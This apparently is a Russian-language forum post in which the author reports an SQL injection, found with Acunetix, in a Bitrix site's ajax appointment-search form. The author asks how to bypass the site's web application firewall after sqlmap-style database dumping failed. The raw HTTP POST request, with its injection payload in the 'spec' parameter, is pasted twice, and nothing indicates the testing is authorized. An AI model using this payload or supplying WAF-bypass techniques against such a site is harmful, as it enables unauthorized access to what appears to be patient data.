Нашёл sql инъекцию через Acunetix в POST запросе и при попытки прочитать бд пишет unable to retrieve the table names for any database , --is-dba пишет current user is DBA: False , пробовал --tamper= , но не вышло . На сайте установлен bitrix как я понял там был firewall , есть ли способ его обойти ?
POST /local/templates/site/ajax/spec_search_form.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://site
Cookie:
Content-Length: 133
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Host: site
Connection: Keep-alive
clinik_id=1&data_record=&doctor=1&fio=1&phone=%2B7(555)-66-6&spec=-1'%20OR%203*2*1=6%20AND%20000489=000489%20--%20&text=&time_record=
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://site
Cookie:
Content-Length: 133
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Host: site
Connection: Keep-alive
clinik_id=1&data_record=&doctor=1&fio=1&phone=%2B7(555)-66-6&spec=-1'%20OR%203*2*1=6%20AND%20000489=000489%20--%20&text=&time_record=